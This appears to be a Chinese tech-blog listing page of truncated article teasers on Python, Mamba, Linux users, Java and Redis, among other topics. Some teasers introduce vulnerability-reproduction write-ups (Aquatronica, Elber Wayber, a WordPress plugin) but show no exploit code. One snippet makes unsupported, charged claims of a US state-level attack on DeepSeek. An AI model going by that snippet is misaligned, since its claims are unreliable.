背景：刚申请的机器python版本是2.6的，需要手动升级到2.7.13版本；步骤：1下载python2.7.13版本的源码包wgethttp://python.org/ftp/python/2.7.13/Python-2.7.13.tgz--no-check-certificate2解压源码包tar-xvfPython-2.7.13.tgz3编译安装cdPython-2.7.13./config
java ffmpeg(Windows/Linux)截取视频做封面 Mr.菜园子 JAVA ffmpeg java ffmpeg java ffmpeg windows(Linux)
一、Windows版本1、下载前往FFmpeg官网http://ffmpeg.org/download.html下载Windows版本FFmpeg（我下载ffmpeg-4.0-win64-shared）2、解压下载后解压到本地（我的解压目录D:\wedive_file\ffmpeg）二、Linux版本1、下载前往FFmpeg官网http://ffmpeg.org/download.html下载Li
Window 下Mamba 环境安装踩坑问题汇总及解决方法（无需绕过selective_scan_cuda） yyywxk #Python模块有关问题 python Windows Mamba
导航安装教程导航Mamba及Vim安装问题参看本人博客：Mamba环境安装踩坑问题汇总及解决方法（初版）Linux下Mamba及Vim安装问题参看本人博客：Mamba环境安装踩坑问题汇总及解决方法（重置版）Windows下Mamba的安装参看本人博客：Window下Mamba环境安装踩坑问题汇总及解决方法（无需绕过selective_scan_cuda）Linux下Vim安装问题参看本人博客：Li
Linux解析/etc/passwd、/etc/shadow、/etc/group和/etc/gshadow文件菜菜的土豆哥 Linux运维 linux 运维服务器
/etc/passwd/etc/passwd文件是Linux系统中用于存储用户账户信息的文件。这个文件对系统中的所有用户都是可读的，因为它不存储密码，密码信息已经移动到了/etc/shadow文件中。示例username:x:1000:1000:UserName:/home/username:/bin/bash用户名:x:用户ID:组ID:用户姓名:/家目录/用户名:/bin/bashuserna
Linux服务器上安装 Vision Mamba 虚拟环境---全面教程 wsa- python 计算机视觉机器学习
本人装环境踩了很多坑，翻了很多大佬的博客最终安装并运行成功！以下是我的经验分享：1.去GitHub下载VisionMamba的code并上传至服务器上GitHub-hustvl/Vim:VisionMamba:EfficientVisualRepresentationLearningwithBidirectionalStateSpaceModelgithub.com/hustvl/Vim编辑2.环
Python Socket编程指南：从入门到实战陈年小趴菜 python python 开发语言 socket 游戏
文章目录一、什么是socket二、mq和socket区别三、客户端代码示例四、服务端代码示例五、结果展示一、什么是socket在Python中使用客户端/服务端Socket可以用于在网络上建立通信连接，实现数据的传输和交换。客户端通过Socket连接向服务端发送请求，服务端接收并处理这些请求，然后返回响应给客户端。客户端/服务端Socket在网络编程中被广泛应用，适用面相当广泛。比如：网络通信：可
【深度分析】DeepSeek 遭暴力破解，攻击 IP 均来自美国，造成影响有多大？有哪些好的防御措施？精通代码大仙深度分析新媒体运营创业创新
技术铁幕下的暗战：当算力博弈演变为代码战争一场针对中国AI独角兽的全球首例国家级密码爆破，揭开了数字时代技术博弈的残酷真相。DeepSeek服务器日志中持续跳动的美国IP地址，不仅是网络攻击的地理坐标，更是技术霸权对新兴挑战者的精准绞杀。这场攻防战早已超越传统网络安全范畴，成为大国科技博弈的微观镜像。暴力破解的每一声警报都在叩击技术主权的边界。攻击波峰时每秒数万次的认证请求，实质是算力优势向网络安
linux用户管理千航@abc linux 运维服务器
用户创建：useradd（用户创建命令的详细使用：用户创建命令的详细使用与参数说明-CSDN博客）用户信息配置文件:/etc/passwdabc:x:1000:1000:abc:/home/abc:/bin/bash第一段:用户名（设置你自己的用户名）第二段:密码占位符（就是字面上的意思，一个占位符，真正的密码在配置文件/etc/shadow里）第三段:UID（用户ID：是系统用来唯一标识一个用户
Aquatronica Control System敏感信息泄露漏洞复现（附脚本） iSee857 漏洞复现安全 web安全
免责申明：本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权，请及时与我们联系，我们将尽快处理并删除相关内容。0x01产品描述：AquatronicaControlSystem是一款先进的水族箱自动化管理系统，专为水族爱好者设计。它通过集成多种传感器和控制模块
Elber Wayber 模拟/数字音频密码重置漏洞复现（附脚本） iSee857 漏洞复现安全 web安全
免责申明：本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权，请及时与我们联系，我们将尽快处理并删除相关内容。0x01产品描述：ElberWayber是一家专注于音频技术解决方案的公司，提供高质量的模拟和数字音频设备，广泛应用于专业录音、广播、现场演出和多媒体
抓包工具：Mitmproxy 一张假钞爬虫网络 http https
Mitmproxy是一组工具，它们为HTTP/1、HTTP/2和WebSocket提供交互式、支持SSL/TLS的拦截代理。特性拦截HTTP和HTTPS请求和响应并动态修改它们。保存完整的HTTP对话，以便以后重放和分析。重放HTTP会话的客户端。重放以前记录的服务器的HTTP响应。反向代理模式将流量转发到指定的服务器。MacOS和Linux上的透明代理模式。使用Python脚本对HTTP流量进行
vim的介绍 silver687 vim
Vim简介Vim（全称ViIMproved）是一款功能强大的文本编辑器，最初由BramMoolenaar在1991年基于Vi编辑器开发而成。它是一款开源软件，广泛应用于各种操作系统（如Linux、Unix、Windows等），尤其在程序员和系统管理员中非常受欢迎。1.主要特点•高度可定制化：Vim支持通过配置文件（.vimrc）和插件来扩展功能，用户可以根据自己的需求调整编辑器的行为。•多模式编辑
腾讯云服务器安装jdk1.8——linux（CentOS_6、7） Zhumory centos linux jdk
云服务器安装JDK1.自己电脑安装好WinSCP2.Windows操作系统，通过WinSCP上传文件。3.先登陆到云服务器并开启服务器，然后打开WinSCP协议：选填SFTP或者SCP均可。主机名：云服务器的公网IP。登录云服务器控制台即可查看对应云服务器的公网IP。端口：默认为22。密码：云服务器的用户名对应的密码。用户名：云服务器的系统用户名，SUSE/CentOS/Debian系统：root
2024年网安最新史上最全网络安全站点集合_网络安全漏洞网站 2401_84253850 程序员 web安全安全
http://www.7kb.org/(7kb论坛)http://lu4n.com/（lun博客）OD体育平台-首页（cnbiraid博客）http://blog.neargle.com（neargle博客)https://lightrains.org（lightrains博客)首页-imlonghao（imlonghao博客）ZeroKeeper（zerokeeper博客）http://www.
WordPress Web Directory Free插件本地包含漏洞复现(附脚本)（CVE-2024-3673） iSee857 安全 web安全
免责申明：本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权，请及时与我们联系，我们将尽快处理并删除相关内容。0x01产品描述：WebDirectoryFree是一款用于WordPress的免费插件，主要用于创建和管理在线目录网站。它允许用户轻松地添加、管理和
【Linux】Linux C判断两个IPv6地址是否有包含关系 wellnw Linux IPV6 linux 服务器算法
功能说明要判断两个IPv6地址是否具有包含关系，包括前缀的比较，可以通过以下步骤实现：解析IPv6地址和前缀：将两个IPv6地址和它们的前缀长度解析为二进制形式。生成掩码：根据前缀长度生成掩码。按位比较：使用掩码对两个IPv6地址进行按位与操作，判断它们是否匹配。代码实现#include#include#include//判断两个IPv6地址是否具有包含关系（包括前缀）intis_ipv6_pre
mondb入手木zi_鸣 mongodb
windows 启动mongodb 编写bat文件， mongod --dbpath D:\software\MongoDBDATA mongod --help 查询各种配置配置在mongob 打开批处理，即可启动，27017原生端口，shell操作监控端口扩展28017，web端操作端口启动配置文件配置，数据更灵活
大型高并发高负载网站的系统架构 bijian1013 高并发负载均衡
扩展Web应用程序一.概念简单的来说，如果一个系统可扩展，那么你可以通过扩展来提供系统的性能。这代表着系统能够容纳更高的负载、更大的数据集，并且系统是可维护的。扩展和语言、某项具体的技术都是无关的。扩展可以分为两种： 1.
DISPLAY变量和xhost(原创) czmmiao display
DISPLAY 在Linux/Unix类操作系统上, DISPLAY用来设置将图形显示到何处. 直接登陆图形界面或者登陆命令行界面后使用startx启动图形, DISPLAY环境变量将自动设置为:0:0, 此时可以打开终端, 输出图形程序的名称(比如xclock)来启动程序, 图形将显示在本地窗口上, 在终端上输入printenv查看当前环境变量, 输出结果中有如下内容:DISPLAY=:0.0
获取B/S客户端IP 周凡杨 java 编程 jsp Web 浏览器
最近想写个B/S架构的聊天系统，因为以前做过C/S架构的QQ聊天系统，所以对于Socket通信编程只是一个巩固。对于C/S架构的聊天系统，由于存在客户端Java应用，所以直接在代码中获取客户端的IP，应用的方法为： String ip = InetAddress.getLocalHost().getHostAddress(); 然而对于WEB
浅谈类和对象朱辉辉33 编程
类是对一类事物的总称，对象是描述一个物体的特征，类是对象的抽象。简单来说，类是抽象的，不占用内存，对象是具体的，占用存储空间。类是由属性和方法构成的，基本格式是public class 类名{ //定义属性 private/public 数据类型属性名； //定义方法 publ
android activity与viewpager+fragment的生命周期问题肆无忌惮_ viewpager
有一个Activity里面是ViewPager，ViewPager里面放了两个Fragment。第一次进入这个Activity。开启了服务，并在onResume方法中绑定服务后，对Service进行了一定的初始化，其中调用了Fragment中的一个属性。 super.onResume(); bindService(intent, conn, BIND_AUTO_CREATE);
base64Encode对图片进行编码 843977358 base64 图片 encoder
/** * 对图片进行base64encoder编码 * * @author mrZhang * @param path * @return */ public static String encodeImage(String path) { BASE64Encoder encoder = null; byte[] b = null; I
Request Header简介 aigo servlet
当一个客户端(通常是浏览器)向Web服务器发送一个请求是，它要发送一个请求的命令行，一般是GET或POST命令，当发送POST命令时，它还必须向服务器发送一个叫“Content-Length”的请求头(Request Header) 用以指明请求数据的长度，除了Content-Length之外，它还可以向服务器发送其它一些Headers，如：
HttpClient4.3 创建SSL协议的HttpClient对象 alleni123 httpclient 爬虫 ssl
public class HttpClientUtils { public static CloseableHttpClient createSSLClientDefault(CookieStore cookies){ SSLContext sslContext=null; try { sslContext=new SSLContextBuilder().l
java取反 -右移-左移-无符号右移的探讨百合不是茶位运算符位移
取反：在二进制中第一位，1表示符数，0表示正数 byte a = -1; 原码：10000001 反码：11111110 补码：11111111 //异或: 00000000 byte b = -2; 原码：10000010 反码：11111101 补码：11111110 //异或: 00000001
java多线程join的作用与用法 bijian1013 java 多线程
对于JAVA的join，JDK 是这样说的：join public final void join （long millis ）throws InterruptedException Waits at most millis milliseconds for this thread to die. A timeout of 0 means t
Java发送http请求(get 与post方法请求) bijian1013 java spring
PostRequest.java package com.bijian.study; import java.io.BufferedReader; import java.io.DataOutputStream; import java.io.IOException; import java.io.InputStreamReader; import java.net.HttpURL
【Struts2二】struts.xml中package下的action配置项默认值 bit1129 struts.xml
在第一部份，定义了struts.xml文件，如下所示： <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache.org/dtds/struts
【Kafka十三】Kafka Simple Consumer bit1129 simple
代码中关于Host和Port是割裂开的，这会导致单机环境下的伪分布式Kafka集群环境下，这个例子没法运行。实际情况是需要将host和port绑定到一起， package kafka.examples.lowlevel; import kafka.api.FetchRequest; import kafka.api.FetchRequestBuilder; impo
nodejs学习api ronin47 nodejs api
NodeJS基础什么是NodeJS JS是脚本语言，脚本语言都需要一个解析器才能运行。对于写在HTML页面里的JS，浏览器充当了解析器的角色。而对于需要独立运行的JS，NodeJS就是一个解析器。每一种解析器都是一个运行环境，不但允许JS定义各种数据结构，进行各种计算，还允许JS使用运行环境提供的内置对象和方法做一些事情。例如运行在浏览器中的JS的用途是操作DOM，浏览器就提供了docum
java-64.寻找第N个丑数 bylijinnan java
public class UglyNumber { /** * 64.查找第N个丑数具体思路可参考 [url] http://zhedahht.blog.163.com/blog/static/2541117420094245366965/[/url] * 题目：我们把只包含因子 2、3和5的数称作丑数（Ugly Number）。例如6、8都是丑数，但14
二维数组（矩阵）对角线输出 bylijinnan 二维数组
/** 二维数组对角线输出两个方向例如对于数组： { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 9, 10, 11, 12 }, { 13, 14, 15, 16 }, slash方向输出： 1 5 2 9 6 3 13 10 7 4 14 11 8 15 12 16 backslash输出： 4 3
[JWFD开源工作流设计]工作流跳跃模式开发关键点(今日更新) comsci 工作流
既然是做开源软件的,我们的宗旨就是给大家分享设计和代码,那么现在我就用很简单扼要的语言来透露这个跳跃模式的设计原理大家如果用过JWFD的ARC-自动运行控制器,或者看过代码,应该知道在ARC算法模块中有一个函数叫做SAN(),这个函数就是ARC的核心控制器,要实现跳跃模式,在SAN函数中一定要对LN链表数据结构进行操作,首先写一段代码,把
redis常见使用 cuityang redis 常见使用
redis 通常被认为是一个数据结构服务器，主要是因为其有着丰富的数据结构 strings、map、 list、sets、 sorted sets 引入jar包 jedis-2.1.0.jar (本文下方提供下载) package redistest; import redis.clients.jedis.Jedis; public class Listtest
配置多个redis dalan_123 redis
配置多个redis客户端 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi=&quo
attrib命令 dcj3sjt126com attr
attrib指令用于修改文件的属性.文件的常见属性有:只读.存档.隐藏和系统. 只读属性是指文件只可以做读的操作.不能对文件进行写的操作.就是文件的写保护. 存档属性是用来标记文件改动的.即在上一次备份后文件有所改动.一些备份软件在备份的时候会只去备份带有存档属性的文件.
Yii使用公共函数 dcj3sjt126com yii
在网站项目中，没必要把公用的函数写成一个工具类，有时候面向过程其实更方便。在入口文件index.php里添加 require_once('protected/function.php'); 即可对其引用，成为公用的函数集合。 function.php如下： <?php /** * This is the shortcut to D
linux 系统资源的查看（free、uname、uptime、netstat） eksliang netstat linux uname linux uptime linux free
linux 系统资源的查看转载请出自出处：http://eksliang.iteye.com/blog/2167081 http://eksliang.iteye.com 一、free查看内存的使用情况语法如下： free [-b][-k][-m][-g] [-t] 参数含义 -b:直接输入free时，显示的单位是kb我们可以使用b(bytes),m
JAVA的位操作符 greemranqq 位运算 JAVA位移 <<>>>
最近几种进制，加上各种位操作符，发现都比较模糊，不能完全掌握，这里就再熟悉熟悉。 1.按位操作符：按位操作符是用来操作基本数据类型中的单个bit,即二进制位，会对两个参数执行布尔代数运算，获得结果。与（&）运算： 1&1 = 1, 1&0 = 0, 0&0 &
Web前段学习网站 ihuning Web
Web前段学习网站菜鸟学习：http://www.w3cschool.cc/ JQuery中文网：http://www.jquerycn.cn/ 内存溢出：http://outofmemory.cn/#csdn.blog http://www.icoolxue.com/ http://www.jikexue
强强联合：FluxBB 作者加盟 Flarum justjavac r
原文：FluxBB Joins Forces With Flarum作者：Toby Zerner译文：强强联合：FluxBB 作者加盟 Flarum译者：justjavac FluxBB 是一个快速、轻量级论坛软件，它的开发者是一名德国的 PHP 天才 Franz Liedke。FluxBB 的下一个版本(2.0)将被完全重写，并已经开发了一段时间。FluxBB 看起来非常有前途的，
java统计在线人数（session存储信息的） macroli java Web
这篇日志是我写的第三次了前两次都发布失败！郁闷极了！由于在web开发中常常用到这一部分所以在此记录一下，呵呵，就到备忘录了！我对于登录信息时使用session存储的，所以我这里是通过实现HttpSessionAttributeListener这个接口完成的。 1、实现接口类，在web.xml文件中配置监听类，从而可以使该类完成其工作。 public class Ses
bootstrp carousel初体验快速构建图片播放 qiaolevip 每天进步一点点学习永无止境 bootstrap 纵观千象
img{ border: 1px solid white; box-shadow: 2px 2px 12px #333; _width: expression(this.width > 600 ? "600px" : this.width + "px"); _height: expression(this.width &
SparkSQL读取HBase数据，通过自定义外部数据源 superlxw1234 spark sparksql sparksql读取hbase sparksql外部数据源
关键字：SparkSQL读取HBase、SparkSQL自定义外部数据源前面文章介绍了SparSQL通过Hive操作HBase表。 SparkSQL从1.2开始支持自定义外部数据源(External DataSource)，这样就可以通过API接口来实现自己的外部数据源。这里基于Spark1.4.0，简单介绍SparkSQL自定义外部数据源，访
Spring Boot 1.3.0.M1发布 wiselyman spring boot
Spring Boot 1.3.0.M1于6.12日发布，现在可以从Spring milestone repository下载。这个版本是基于Spring Framework 4.2.0.RC1,并在Spring Boot 1.2之上提供了大量的新特性improvements and new features。主要包含以下： 1.提供一个新的sprin

vulnstack（一） 红日靶场复现